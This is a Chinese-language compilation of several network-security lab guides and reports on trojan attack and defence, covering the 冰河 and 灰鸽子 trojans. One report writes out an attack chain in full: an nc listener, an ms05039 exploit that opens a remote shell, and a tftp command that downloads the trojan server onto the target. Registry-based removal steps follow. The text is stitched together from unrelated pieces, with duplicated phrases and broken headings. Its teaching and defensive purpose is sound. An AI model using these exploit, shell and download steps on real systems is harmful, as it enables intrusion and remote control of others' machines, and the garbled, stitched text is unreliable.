实验指导5:木马攻击与防范实验指导书
实验一 木马攻击与防范
实验1 木马攻击与防范一、实验目的通过对木马的练习,使读者理解和掌握木马传播和运行的机制;通过手动删除木马,掌握检查木马和删除木马的技巧,学会防御木马的相关知识,加深对木马的安全防范意识。
二、实验原理木马的全称为特洛伊木马,源自古希腊神话。
木马是隐藏在正常程序中的具有特殊功能的恶意代码,是具备破坏、删除和修改文件、发送密码、记录键盘、实施DoS攻击甚至完全控制计算机等特殊功能的后门程序。
它隐藏在目标计算机里,可以随计算机自动启动并在某一端口监听来自控制端的控制信息。
1.木马的特性木马程序为了实现其特殊功能,一般应该具有以下性质:(1)伪装性:程序将自己的服务器端伪装成合法程序,并且诱惑被攻击者执行,使木马代码会在未经授权的情况下装载到系统中并开始运行。
(2)隐藏性:木马程序同病毒程序一样,不会暴露在系统进程管理器内,也不会让使用者察觉到木马的存在,它的所有动作都是伴随其它程序进行的,因此在一般情况下使用者很难发现系统中有木马的存在。
(3)破坏性:通过远程控制,攻击者可以通过木马程序对系统中的文件进行删除、编辑操作,还可以进行诸如格式化硬盘、改变系统启动参数等恶性破坏操作。
(4)窃密性:木马程序最大的特点就是可以窥视被入侵计算机上的所有资料,这不仅包括硬盘上的文件,还包括显示器画面、使用者在操作电脑过程中在硬盘上输入的所有命令等。
2.木马的入侵途径木马入侵的主要途径是通过一定的欺骗方法,如更改图标、把木马文件与普通文件合并,欺骗被攻击者下载并执行做了手脚的木马程序,就会把木马安装到被攻击者的计算机中。
木马也可以通过Script、ActiveX及ASP、CGI交互脚本的方式入侵,由于微软的浏览器在执行Script 脚本上存在一些漏洞,攻击者可以利用这些漏洞诱导上网者单击网页,这样IE浏览器就会自动执行脚本,实现木马的下载和安装。
木马还可以利用系统的一些漏洞入侵,如微软的IIS服务器存在多种溢出漏洞,通过缓冲区溢出攻击程序造成IIS服务器溢出,获得控制权限,然后在被攻击的服务器上安装并运行木马。
网络安全实验指导书
实验报告一:黑客攻击方法及木马防范一、实验目的一、实验目的1、 了解常见的黑客攻击方法了解常见的黑客攻击方法2、 掌握常见的黑客软件的使用方法掌握常见的黑客软件的使用方法3、 掌握木马等恶意代码的防范方法掌握木马等恶意代码的防范方法二、实验内容二、实验内容1、 本机上构建虚拟机系统,在虚拟计算机上安装“冰河”服务器端,本地计算机中安装“冰河”客户端。
试用“冰河”的客户端控制服务器端计算机,记录试验步骤。
装“冰河”客户端。
试用“冰河”的客户端控制服务器端计算机,记录试验步骤。
2、 在安装冰河服务器端的计算机中,下载并安装“木马克星”,并对计算机扫描,记录扫描及查杀效果。
录扫描及查杀效果。
3、 使用“流光”扫描远程终端服务端口是否开放,记录开放的端口号,分析可能的入侵方法。
侵方法。
三、实验小结三、实验小结实验报告二:入侵检测及WEB安全技术一、实验目的一、实验目的1、了解入侵检测方法、了解入侵检测方法2、了解WEB 安全技术安全技术2、掌握常用入侵检测软件的使用方法、掌握常用入侵检测软件的使用方法3、掌握服务器的安全配置方法、掌握服务器的安全配置方法二、实验内容二、实验内容1、Snort Snort 的使用的使用的使用1.1、在网站上下载Snort Snort,并安装,并安装,并安装1.2、Snort Snort 探测规则的设置探测规则的设置探测规则的设置1.3、Snort Snort 的使用的使用的使用1.4、练习Snort 的不同运行模式的不同运行模式1.5、Snort 的日志分析的日志分析2、Web 安全技术安全技术2.1.1.配置配置Windows 2000 Server 的帐号、端口、的帐号、端口、IIS IIS IIS、安全日志、目录和文件权限等。
、安全日志、目录和文件权限等。
2.2.2.配置配置Windows 2000 NT 系统的安全。
系统的安全。
2.3.3.配置拥护管理的安全。
配置拥护管理的安全。
网络安全经典实验
网络安全经典实验网络安全经典实验:木马攻击与防御网络安全是当今社会中不可忽视的重要领域之一。
为了保护个人和组织的信息安全,人们不断进行实验研究,以提升网络安全技术水平。
木马攻击与防御是网络安全领域中的经典实验之一,通过它可以深入了解木马的工作原理以及有效的防御方法。
一、实验背景在网络安全中,木马是一种具有欺骗性的恶意软件,它隐藏在看似无害的程序中,一旦被运行,就会窃取用户的敏感信息或者给系统带来破坏。
为了更好地理解木马攻击的过程和防御方法,进行木马实验是非常必要的。
二、实验目的1. 了解木马的定义、分类、特点及危害。
2. 掌握常见的木马攻击手段及其工具。
3. 学会基本的木马防御原理和方法。
三、实验内容本实验将以实际网络环境为背景,分为两个部分进行:木马攻击和木马防御。
1. 木马攻击实验:(1) 选择一个合适的木马程序,并确保该程序的危害性较低。
(2) 将木马程序安装到某一目标计算机上。
(3) 检测木马程序是否成功植入目标计算机,并验证木马程序可以实现的功能。
2. 木马防御实验:(1) 了解常见的木马防御原理,如入侵检测系统(IDS)、入侵防御系统(IPS)、防火墙等。
(2) 配置入侵检测系统和防火墙,设置规则以屏蔽已知的木马攻击。
(3) 对目标计算机进行木马扫描,检测入侵检测系统和防火墙的防御效果。
四、实验结果与分析通过木马攻击实验,可以深入了解木马的工作原理和危害。
同时,还可以体验到木马对计算机系统的破坏力,加深对网络安全的认识。
通过木马防御实验,可以了解到入侵检测系统和防火墙在木马防御中的重要性。
通过配置防御系统并设置规则,可以有效屏蔽已知的木马攻击,提升网络的安全性。
五、实验总结通过木马攻击与防御实验,我们深入了解了木马的工作原理和防御方法。
网络安全是一个复杂的领域,不断的研究和实验是提高网络安全技术水平的必经之路。
在日常生活中,我们应该保持警惕,不随便点击不明链接或下载不明软件。
同时,定期更新操作系统和软件,使用可信的杀毒软件和防火墙等工具,以加强网络的安全性。
木马攻击及防御技术实验报告
目录第一章引言 (1)第二章木马概述 (1)2.1木马的定义及特点 (1)2.2木马的工作原理 (2)2.3木马的分类.................................................... 第三章常见的木马攻击手段3.1捆绑方式.....................................................3.2邮件和QQ冒名欺骗............................................3.3网页木马方式.................................................3.4伪装成其他文件...............................................第四章木马的防范措施4.1安装个人防火墙、木马查杀软件和及时安装系统补丁...............4.2隐藏IP和关闭不必要的端口....................................4.3使用虚拟计算机...............................................4.4关闭不必要的服务选项.........................................4.5定期检查电脑的启动项.........................................4.6不要随意打开邮件.............................................4.7谨慎下载和安装第三方软件.....................................第五章总结........................................................参考文献...........................................................第一章引言随着计算机的日益普及,人们对于“木马”一词已不陌生。
实验指导5:木马攻击与防范实验指导书
实验指导5 木马攻击与防范实验1.实验目的理解和掌握木马传播和运行的机制,掌握检查和删除木马的技巧,学会防御木马的相关知识,加深对木马的安全防范意识。
2.预备知识2.1木马及木马技术的介绍(1)木马概念介绍很多人把木马看得很神秘,其实,木马就是在用户不知道的情况下被植入用户计算机,用来获取用户计算机上敏感信息(如用户口令,个人隐私等)或使攻击者可以远程控制用户主机的一个客户服务程序。
这种客户/服务模式的原理是一台主机提供服务(服务器),另一台主机使用服务(客户机)。
作为服务器的主机一般会打开一个默认的端口并进行监听(Listen),如果有客户机向服务器的这一端口提出连接请求(Connect Request),服务器上的相应守护进程就会自动运行,来应答客户机的请求。
通常来说,被控制端相当于一台服务器,控制端则相当于一台客户机,被控制端为控制端提供预定的服务。
(2)木马的反弹端口技术由于防火墙对于进入的链接往往会进行非常严格的过滤,但是对于连出的链接却疏于防范。
于是,与一般的木马相反,反弹端口型木马的服务端(被控制端)使用主动端口,客户端(控制端)使用被动端口。
木马定时监测控制端的存在,发现控制端上线立即弹出端口主动连结控制端打开的主动端口;为了隐蔽起见,控制端的被动端口一般开在80,这样,即使用户使用端口扫描软件检查自己的端口,发现的也是类似TCP UserIP:1026ControllerIP:80 ESTABLISHED的情况,稍微疏忽一点,你就会以为是自己在浏览网页。
(3)线程插入技术木马程序的攻击性有了很大的加强,在进程隐藏方面,做了较大的改动,不再采用独立的EXE可执行文件形式,而是改为内核嵌入方式、远程线程插入技术、挂接PSAPI等。
这样木马的攻击性和隐藏性就大大增强了。
2.2木马攻击原理特洛伊木马是一个程序,它驻留在目标计算机里,可以随计算机自动启动并在某一端口进行侦听,在对接收的数据识别后,对目标计算机执行特定的操作。
堡垒机实训指导(五)木马病毒
5.再次通过使用远程桌面登录到服务端 ,并执行服务端程序。 6.关闭远程桌面,个人PC端使用客户端灰鸽子程序,点击“增加主机”,添加服务 端目标IP。
7.可进行一系列操作,如查看对方系统信息带的防火墙处阻止该进程。
2. 更新杀毒软件查杀病毒或者从官方下载有效的灰鸽子专杀工具。
实训步骤:
1. 打开已经下载好的灰鸽子木马所在的文件夹,双击灰鸽子客户端( 本实验中如果碰到灰鸽子客户端无法打开的情形,请从“灰鸽子_牵 手.zip”重新解压生成一个新的客户端程序再执行)。 2. “文件”--“配置服务程序”或直接从F12进入服务器端配置
3.进行相应的设置后,点击“生成服务器”。 4.通过 Windows 网络共享的方式,将服务端程序拷贝到虚拟主机预先共享 的文件夹share中,访问共享的用户名和密码仍然是“administrator” 和 “demo” 。
堡垒机实训指导
木马病毒
木马病毒
大竹大竹 =雷庆编 =雷庆编
实训(六)灰鸽子木马利用与防护
实训目的:
木马,又名特洛伊木马,其名称取自古希腊神话的特洛伊 木马记,它是一种基于远程控制的黑客工具,具有很强的隐蔽 性和危害性。为了达到控制服务端主机的目的,木马往往要采 用各种手段达到激活自己、加载运行的目的。本案例以国内著 名的灰鸽子木马为例讲述木马的使用和防御。 了解木马病毒对终端主机的安全威胁,以及木马病毒如何 对主机进行攻击。
网络安全实验报告 (5)
《网络安全》实验报告实验序号:5 实验项目名称:木马攻击与防范实验图1 运行nc接着再开一个dos窗口,运行ms05039 192.168.20.23 192.168.20.1 99 1图2 运行ms2)攻击成功后,在运行nc -vv -l -p 99 的dos窗口中出现如图3提示,若攻不成功请参照“缓冲区溢出攻击与防范实验”,再次进行攻击。
图3 攻击成功示意3)在此窗口中运行tftp -i 192.168.20.1 get g_server.exe图4 上载木马程序并运行图5 文件传送步骤3:运行木马客户程序控制远程主机1)打开程序端程序,单击快捷工具栏中的“添加主机”按扭图6 添加主机2)“文件管理器”使用。
点击各个驱动器或者文件夹前面的展开符号,可以浏览目标主机内容。
图7 成功下载文件后界面2)“命令控制台”使用。
单击“命令控制台”的标签,弹出命令控制台界面步骤4:删除“冰河”木马✧打开HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 如图8。
在目录中发现了一个默认的键值C:\WINNT\System32\kernel32.exe,这就是“冰河”木马在注册表中加入的键值,将它删除。
✧打开HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVesion\Runse rvices,如图9。
在目录中也发现了一个默认的键值C:\WINNT\System32\kernel32.exe,这也是“冰河”在注册表中加入的键值,将它删除。
上面两个注册表的子键目录Run和Runservices中存放的键值是系统启动时自启动的程序,一般病毒程序,木马程序,后门程序等都放在这些子键目录下,所以要经常检查这些目录下的程序。
图8 注册表编辑图9注册表编辑然后再进入C:\WINNT\System32目录,找到“冰河”的两个可执行文件Kernel32.exe 和Sysexplr.exe文件,将它们删除。
实验四:木马攻击与防范
10计科罗国民 201030457115网络安全与维护实验报告实验四:木马攻击与防范一、实验目的通过对木马的练习,使读者理解和掌握木马传播和运行的机制;通过手动删除木马,掌握检查木马和删除木马的技巧,学会防御木马的相关知识,加深对木马的安全防范意识。
二、实验要求通过实验了解木马攻击的原理,了解如何防范木马的入侵。
三、实验原理及内容木马是隐藏在正常程序中的具有特殊功能的恶意代码,是具备破坏、删除和修改文件、发送密码、记录键盘、实施DOS攻击甚至完全控制计算机等特殊功能的后门程序。
它隐藏在目标的计算机里,可以随计算机自动启动并在某一端口监听来自控制端的控制信息。
1、木马的特性木马程序为了实现某特殊功能,一般应该具有以下性质:(1)伪装性: 程序把自己的服务器端伪装成合法程序,并且诱惑被攻击者执行,使木马代码会在未经授权的情况下装载到系统中并开始运行。
(2)隐藏性:木马程序同病毒一样,不会暴露在系统进程管理器内,也不会让使用者察觉到木马的存在,它的所有动作都是伴随其它程序进行的,因此在一般情况下使用者很难发现系统中有木马的存在。
(3)破坏性:通过远程控制,攻击者可以通过木马程序对系统中的文件进行删除、编辑操作,还可以进行诸如格式化硬盘、改变系统启动参数等个性破坏操作。
(4)窃密性:木马程序最大的特点就是可以窥视被入侵计算机上的所有资料,这不仅包括硬盘上的文件,还包括显示器画面、使用者在操作电脑过程中在硬盘上输入的所有命令等。
2、木马的入侵途径木马入侵的主要途径是通过一定的欺骗方法,如更改图标、把木马文件与普通文件合并,欺骗被攻击者下载并执行做了手脚的木马程序,就会把木马安装到被攻击者的计算机中。
木马也可以通过Script、ActiveX及ASP、CGI交互脚本的方式入侵,由于微软的浏览器在执行Script脚本上存在一些漏洞,攻击者可以利用这些漏洞又到上网者单击网页,这样IE浏览器就会自动执行脚本,实现木马的下载和安装。
《信息安全》实验报告5 木马攻击
《信息安全》实验报告(5)实验名称:________________ 指导教师:___________ 完成日期:________________专 业:________________ 班 级:___________ 姓 名:________________ 一、实验目的:了解常见的网络攻击的概念和类型;了解木马攻击的原理,了解常见的木马类型,掌握防范木马攻击的方法;了解利用木马实施攻击的方法。
二、实验内容:1、利用“冰河”或其他类型的木马实施攻击。
(该实验需要2名同学合作完成)。
2、验证电脑安全防护软件在防范木马攻击中的作用。
三、实验过程:(实现步骤等)1. 首先在要被攻击电脑上运行G_SERVER.EXE 冰河木马服务端(前提是360安全杀毒软件暂未运行);2. 然后再攻击端运行G_CLIENT.EXE 冰河木马客户端,运行如下图:木马攻击 于泳海 2014-12-3 信息管理与信息系统11级信本班 贾文丽3.添加被攻击端的IP地址,进行攻击,可对被攻击端进行,数据操作拷贝、删除,以及对屏幕进行操作等;1)添加被攻击者IP:2)查看、拷贝和删除被攻击者数据:3)对屏幕控制,可控制输入等操作:4.当被攻击者开启杀毒软件后,无法进行控制,木马将会被查杀。
四、实验结果与结论:在做木马攻击与被攻击实验,可以看出,在没有安装或运行杀毒软件时,攻击是轻而易举的,且对被攻击者电脑操作有很多,被攻击者电脑使用有时还会出现无法使用或不正常状态,例如输入文字时可能出现未按大写键,却出现输入大写字母而不是文字的情况。
从上述实验中可以了解到木马的作用在于以潜伏隐藏的手段,接收到发起攻击的客户端,服务端(被攻击端)就会相应操作,达到数据获取,破坏用户的正常使用等。
五、实验总结:(实验中遇到的问题及解决方法,心得体会等)通过对本节课程的学习,使我们了解了常见的网络攻击的概念和类型,知道了木马攻击的原理和常见的木马类型,掌握了防范木马攻击的方法并学会了利用木马实施攻击的方法。
木马攻击实验报告
木马攻击实验报告
《木马攻击实验报告》
近年来,随着网络技术的不断发展,网络安全问题也日益凸显。
其中,木马攻击作为一种常见的网络安全威胁方式,给网络系统的安全运行带来了严重的威胁。
为了深入了解木马攻击的原理和特点,我们进行了一次木马攻击实验,并撰写了本次实验报告。
实验背景:本次实验旨在通过模拟网络环境,了解木马攻击的实际效果和防范措施。
我们选择了一个虚拟网络环境,搭建了一台主机作为攻击者,一台主机作为受害者,以及一台主机作为监控者。
实验过程:首先,我们在受害者主机上安装了一个虚拟的木马程序,并设置了相应的触发条件。
然后,攻击者主机通过网络连接到受害者主机,利用木马程序对其进行攻击。
在攻击的过程中,我们观察到受害者主机的系统出现了异常现象,包括文件被删除、系统崩溃等。
最后,我们通过监控者主机对攻击进行了记录和分析。
实验结果:通过实验,我们发现木马攻击具有隐蔽性强、破坏性大的特点。
一旦受害者主机感染了木马程序,攻击者可以远程控制受害者主机,窃取敏感信息,甚至对系统进行破坏。
同时,我们也发现了一些防范木马攻击的方法,包括加强网络安全意识、定期更新系统补丁、安装杀毒软件等。
结论:木马攻击是一种严重的网络安全威胁,对网络系统的安全稳定造成了严重的影响。
通过本次实验,我们深入了解了木马攻击的原理和特点,为今后的网络安全防范工作提供了重要的参考。
我们也呼吁广大网络用户加强网络安全意识,共同维护网络安全。
实验五 网络攻击与防范实验
实验五:网络攻击与防范实验一、实验目的1、了解常见的木马程序进行远程控制的使用方法,掌握木马传播和运行的机制;2、掌握防范木马、检测木马以及手动删除木马的方法;二、实验环境1. Windows操作系统,局域网环境,“冰河”、“灰鸽子”木马实验软件。
2. 实验每两个学生为一组:互相进行攻击或防范。
三、实验内容练习“冰河”木马的攻击与防范四、实验步骤任务一:练习“冰河”木马的攻击与防范“冰河”木马采用木马的传统连接技术,包含两个文件:G_Client.exe和G_Server.exe。
G_Client.exe是监控端执行程序,可以用于监控远程计算机和配置服务器,G_Server.exe是被监控端后台监控程序。
打开控制端,弹出“冰河”主界面。
文件管理器对文件操作提供了下列鼠标操作功能:1. 文件上传:右键单击欲上传的文件,选择'复制',在目的目录中粘贴即可。
也可以在目的目录中选择'文件上传自',并选定欲上传的文件;2. 文件下载:右键单击欲下载的文件,选择'复制',在目的目录中粘贴即可。
也可以在选定欲下载的文件后选择'文件下载至',并选定目的目录及文件名;3. 打开远程或本地文件:选定欲打开的文件,在弹出菜单中选择'远程打开'或'本地打开',对于可执行文件若选择了'远程打开',可以进一步设置文件的运行方式和运行参数(运行参数可为空);4. 删除文件或目录:选定欲删除的文件或目录,在弹出菜单中选择'删除';5. 新建目录:在弹出菜单中选择'新建文件夹'并输入目录名即可;6. 文件查找:选定查找路径,在弹出菜单中选择'文件查找',并输入文件名即可(支持通配符);7. 拷贝整个目录(只限于被监控端本机):选定源目录并复制,选定目的目录并粘贴即可。
.. 单击“命令控制台”按钮,冰河的核心部分就在这里,点击“口令类命令”选择“系统信息及口令”项,点击“系统信息与口令”,得到下图所示的信息命令控制台主要命令:1. 口令类命令: 系统信息及口令、历史口令、击键记录;2. 控制类命令: 捕获屏幕、发送信息、进程管理、窗口管理、鼠标控制、系统控制、其它控制(如'锁定注册表'等);3. 网络类命令: 创建共享、删除共享、查看网络信息;4. 文件类命令: 目录增删、文本浏览、文件查找、压缩、复制、移动、上传、下载、删除、打开(对于可执行文件则相当于创建进程);5. 注册表读写: 注册表键值读写、重命名、主键浏览、读写、重命名;6. 设置类命令: 更换墙纸、更改计算机名、读取服务器端配置、在线修改服务器配置。
木马攻击实验报告
木马攻击实验报告木马攻击实验报告引言:在当今数字化时代,网络安全问题变得日益严峻。
木马攻击作为一种常见的网络攻击手段,给个人和企业的信息安全带来了巨大威胁。
为了更好地了解木马攻击的原理和防范方法,我们进行了一系列的实验并撰写本报告。
一、实验背景1.1 木马攻击的定义和特点木马攻击是一种通过在目标计算机上植入恶意软件的方式,以获取目标计算机的控制权或者窃取敏感信息的行为。
与其他病毒相比,木马病毒更加隐蔽,不容易被发现和清除,给受害者带来的损失更大。
1.2 实验目的通过实验,我们旨在深入了解木马攻击的原理和过程,掌握常见木马的特征和防范方法,并提高对网络安全的意识和保护能力。
二、实验过程2.1 实验环境搭建我们搭建了一个包含受害机、攻击机和网络设备的实验环境。
受害机是一台运行Windows操作系统的计算机,攻击机则是一台具备攻击能力的计算机。
两台计算机通过路由器连接在同一个局域网中。
2.2 木马攻击实验我们选择了常见的典型木马病毒进行实验,包括黑客常用的远程控制木马、键盘记录木马和数据窃取木马。
通过在攻击机上模拟黑客行为,我们成功地将这些木马病毒传输到受害机上,并获取了受害机的控制权和敏感信息。
2.3 实验结果分析通过实验,我们发现木马病毒的传播途径多种多样,包括电子邮件附件、下载软件、网络漏洞等。
木马病毒一旦感染到目标计算机,往往会在后台默默运行,窃取用户的隐私信息或者利用受害机进行更大范围的攻击。
三、实验反思3.1 实验中的不足之处在实验过程中,我们发现自身的网络安全意识和知识储备还有待提高。
在木马攻击的防范方面,我们对于防火墙、杀毒软件等防护工具的使用和配置还不够熟练,需要进一步学习和实践。
3.2 实验的启示和收获通过本次实验,我们深刻认识到了木马攻击的危害性和普遍性。
我们意识到加强网络安全意识和技术防范的重要性,不仅要保护自己的计算机和信息安全,还要积极参与到网络安全的维护中。
四、防范木马攻击的建议4.1 加强网络安全意识提高个人和企业对网络安全的重视程度,定期进行网络安全培训,学习常见的网络攻击手段和防范方法。
信息安全实验指导(最新版)
21
实验内容和任务
• 快捷工具栏介绍(从左到右)
• • • • • • • • (1)添加主机:被监控端IP地址添加到主机列表。 (2)删除主机:将被监控端IP地址从主机上删除。 (3)自动搜索:搜索指定子网内安装有冰河的计算机。 (4)查看屏幕:查看被监视端屏幕。 (5)屏幕控制:远程模拟鼠标及键盘输入。 (6)冰河信使:点对点聊天。 (7)升级1.2版本:通过冰河远程升级服务器程序。 (8)修改远程配置:在线修改访问命令,监听端口等服 务器程序。 • (9)配置本地服务器程序:将安装前对G_Server进行配 置。
19
实验环境
• 两台windows sever 2003的计算机,通过网络
连接。安装冰河木马。
20
实验内容和任务
• 任务1.冰河木马的使用
1.冰河介绍 。冰河木马一般有两个文件组成:G_Client和 G_Server,其中G_Server是木马服务端,用来植入目标电 脑序,G_Client是木马控制端,打开G_Client弹出冰河主界 面
18
实验原理
4.木马工作原理 (1)木马的传统连接方式。一般木马都采用C/S运行模式, 可以分两部分,即客户端和服务器端。原理是当服务器 端在目标计算机运行时,一般会打开一个默认的端口进 行监听。 (2)木马反弹技术,随着防火墙技术发展,它可以有效 拦截传统的连接方式。但是防火墙对内部发起连接认为 正常连接,利用这个缺点让服务器端主动发起连接在通 过某些方式连接到木马客户端。 (3)线程插入技术,一个应用程序运行后,都会在系统 中产生一个进程,同时每个进程对应不同的标识符,系 统会分配一个虚拟内存空间给这个进程,有关一切程序 都会在这里执行。线程插入技术就是利用线程间运行相 对独立性,是木马融入系统的内核,这种技术把木马作 为一个进程,把自身插入其他的应用程序的地址空间。 这样就达到了彻底隐蔽的效果了。
木马攻击与防范
贵州大信息安全原理与技术实验报告学院:计算机学院专业:信息安全班级:信息121 姓名饶永明学号1208060066 实验组实验时间2015.6 指导教师蒋朝惠成绩实验项目名称木马攻击与防范实验目的1.掌握目前常见的7种木马的检测及清除方法2.学会使用工具检测并清除木马实验原理一、木马工作原理1.木马系统构成:硬件、软件、具体连接硬件是控制端和服务器端软件是木马代码连接一般通过网络(IP、端口)2.木马配置程序的功能:伪装和信息反馈3.传播木马(1)传播方式有2:通过e-mail和下载(2)伪装方式:a)修改图标(一般存在e-mail中,会将木马服务器端改为HTML、TXT、ZIP图标等)b)捆绑文件:将木马捆绑在一个安装(可执行)文件上,当文件执行时,木马运行。
(like网络公牛)c)出错显示:一般木马执行时,会像执行程序但却没有任何反应,容易惹人怀疑,所以为了伪装,就显示出错。
d)定制端口:很多老师木马端口是固定的,只要检查端口可知是否被感染。
现在的木马选择在1024~65535之间任选端口,那就不好判断了。
e)自我销毁:毁灭犯罪证据(在windows系统文件中无法找到了)f)木马更名:也是为了防止被找到4.运行木马(1)自启动激活木马:a)注册表 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion下的5个以Run和RunServices主键,有木马键值。
b)WIN.INI→在C:\WINDOWS目录下有配置文件win.ini,用文本方式打开,在[windows]字段中有启动项命令load=和run=,一般为空,若有内容,可能是木马。
c)SYETEM.INI→在C:\WINDOWS目录下有配置文件system.ini,用文本方式打开,在[386Enh],[mic],[driver32]中看有无木马命令木马。
d)Autoexec.bat 和Config.sys →在c盘根目录下着两个文件也可启用木马。
5 实验指导书_计算机网络安全
实验指导书_lly实验五、计算机网络安全1.实验目的●掌握杀毒软件常见使用方法●掌握用SuperScan检测目标主机是否被种植木马2. 实验环境●安装了Windows XP/Windows 2003 Server的PC机●安装了瑞星软件●安装了SuperScan软件3. 实验步骤及内容内容一:杀毒软件的使用1)安装瑞星杀毒软件从网上下载一个杀毒软件。
例如瑞星杀毒软件,双击该软件的“Set.up”文件,开始安装。
安装完成后,进入手动扫描设置向导。
在这里可以对发现病毒所采取的方法、杀毒后返回的操作以及查杀文件的类型进行设置。
第1步进入定制任务设置向导。
第2步进入瑞星监控中心设置。
在这里可以启用各种类型的监控。
第3步对定时升级进行设置,完成对瑞星的设置。
2)使用瑞星扫描系统第1步打开瑞星界面,在查杀目标窗格中,选择要查杀的磁盘,单击右窗格中的“杀毒”按钮就可以开始查杀病毒。
第2步在查杀的过程中,用户可以自己设置暂停还是停止杀毒。
第3步如果找到了病毒,则单击“删除”按钮,就可以把在计算机中的病毒删除掉。
3)使用瑞星进行监控第1步在瑞星杀毒软件中,选择“监控中心”选项卡。
第2步选择要进行监控的对象,单击“启用”按钮,就可以进行监控。
4)使用瑞星个人防火墙第1步安装瑞星个人防火墙。
第2步对瑞星防火墙的设置:选择“设置”→“详细设置”命令,或在右键单击防火墙托管图标,在弹出快捷菜单中选择“系统设置”命令。
在这里可以对启动方式、规则顺序、启动声音报警、状态通知、日志记录种类等进行设置。
第3步扫描木马病毒:选择“操作”→“扫描木马病毒”命令,屏幕右下角弹出扫描窗口,扫描结束后将给出气泡提示,您可以单击“详细信息”查看结果日志。
第4步网络设置:选择“设置”→“设置网络”命令,弹出“网络设置”对话框。
设定网络连接方式,如果设定“通过代理服务器访问网络”,还需要输入代理服务器IP、端口、身份验证信息,单击“确定”按钮完成设置。
网络攻防技术-木马的防范
图5-51 冰河木马在注册表Run中的值
项目五 木马攻击与防范
12
步骤5 在注册表的 “HKEY_LOCAL_MACHINE\software\microsoft\windows\Current\Version\Runservices”下,
还有键值为“C:\windows\system32\kernel32.exe”,如图5-52所示,也要将其删除。
新的木马不断出现,旧的木马变种也很快,有些需要手动查找并清除,有些木马程序有隐藏 属性,必须在Windows窗口中选择“查看”—“文件夹选项”—“查看”—“隐藏文件”—“显示所有文 件”命令,才能看到木马程序。由于木马种类繁多,各有特点,删除方法也不尽相同,需要根 据每种木马的情况具体分析清除方法。
本项目主要内容如下: 1.木马的使用。 2.木马的生成。 3.木马免杀。 4.木马的防范。
项目五 木马攻击与防范
5
项目主要内容: 任务一 木马的使用
任务二 木马的生成 任务三 木马免杀 任务四 木马的防范
项目五 木马攻击与防范
6
任务四 木马的防范
项目五 木马攻击与防范
7
任务描述
木马对网络安全造成极大危害,是造成隐私泄露、垃圾邮件和DDoS攻击的重要原因。一旦 遭受木马攻击,将会对人们的正常工作和生活带来损失。因此,在日常工作生活中,加强对 木马的防范,是预防木马攻击、加强个人信息保护的重要途径。
项目五 木马攻击与防范
19
图5-56 IceSword软件工作界面
项目五 木马攻击与防范
20
3.木马的防御与清除。
(1)软件的下载。
木马一般都是通过E-mail和文件下载传播的,因此,要提高防范意识,不要打开陌生人邮件 中的附件。另外,建议大家到正规网站去下载软件,这些网站的软件更新快,并且大部分都 经过测试,可以放心使用。假如需要下载一些非正规网站上的软件,注意不要在在线状态下 安装软件,一旦软件中含有木马程序,就有可能导致系统信息的泄露。
木马攻击与防范[精]
![木马攻击与防范[精]](https://img.taocdn.com/s3/m/74f1dc452af90242a995e56d.png)
利用网页脚本入侵:通过Script、ActiveX、及ASP、 CGI交互脚本的方式入侵,利用浏览器漏洞实现木 马的下载和安装。
利用漏洞入侵:利用系统的漏洞入侵。 和病毒协作入侵:在病毒感染目标计算机后,通过
驱动程序或修改动态链接库(DLL)来加载木马。
二:实验原理—5.木马的检测
木马的远程控制功能要实现,必须通过执行 一段代码来实现。为此,木马采用的技术再 新,也会在操作系统中留下痕迹。
如果能够对系统中的文件、注册表做全面的 监控,可以实现发现和清除各种木马的目的。
中木马后出现的状况
浏览器自己打开,并且进入某个网站; Windows系统配置自动莫名其妙地被更改;比如
CD-ROM的自动运行配置; 硬盘经常无缘由的进行读写操作; 系统越来越慢,系统资源占用很多; 经常死机; 启动项增加; 莫名的进程; 网络端口的增加;
二:实验原理—1.木马的特性
伪装性:伪装成合法程序。 隐蔽性:在系统中采用隐藏手段,不让使用
者觉察到木马的存在。 破坏性:对目标计算机的文件进行删除、修
改、远程运行,还可以进行诸如改变系统配 置等恶性破坏操作。 窃密性:偷取被入侵计算机上的所有资料。
二:实验原理—2.木马的入侵途径
木马攻击与防范
一:实验目的
通过对木马的练习,理解和掌握木马传播和 运行机制;
通过手动删除木马,掌握检查木马和删除木 马的技巧,学会防御木马的相关知ห้องสมุดไป่ตู้,加深 对木马的安全防范意识。
二:实验原理
木马的全称为特洛伊木马,来源于古希腊神 话。木马是具有远程控制、信息偷取、隐蔽 传输功能的恶意代码,它通过欺骗后者诱骗 的方式安装,并在用户计算机中隐藏以实现 控制用户计算机的目的。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
实验指导5 木马攻击与防范实验1.实验目的理解和掌握木马传播和运行的机制,掌握检查和删除木马的技巧,学会防御木马的相关知识,加深对木马的安全防范意识。
2.预备知识2.1木马及木马技术的介绍(1)木马概念介绍很多人把木马看得很神秘,其实,木马就是在用户不知道的情况下被植入用户计算机,用来获取用户计算机上敏感信息(如用户口令,个人隐私等)或使攻击者可以远程控制用户主机的一个客户服务程序。
这种客户/服务模式的原理是一台主机提供服务(服务器),另一台主机使用服务(客户机)。
作为服务器的主机一般会打开一个默认的端口并进行监听(Listen),如果有客户机向服务器的这一端口提出连接请求(Connect Request),服务器上的相应守护进程就会自动运行,来应答客户机的请求。
通常来说,被控制端相当于一台服务器,控制端则相当于一台客户机,被控制端为控制端提供预定的服务。
(2)木马的反弹端口技术由于防火墙对于进入的链接往往会进行非常严格的过滤,但是对于连出的链接却疏于防范。
于是,与一般的木马相反,反弹端口型木马的服务端(被控制端)使用主动端口,客户端(控制端)使用被动端口。
木马定时监测控制端的存在,发现控制端上线立即弹出端口主动连结控制端打开的主动端口;为了隐蔽起见,控制端的被动端口一般开在80,这样,即使用户使用端口扫描软件检查自己的端口,发现的也是类似TCP UserIP:1026ControllerIP:80 ESTABLISHED的情况,稍微疏忽一点,你就会以为是自己在浏览网页。
(3)线程插入技术木马程序的攻击性有了很大的加强,在进程隐藏方面,做了较大的改动,不再采用独立的EXE可执行文件形式,而是改为内核嵌入方式、远程线程插入技术、挂接PSAPI等。
这样木马的攻击性和隐藏性就大大增强了。
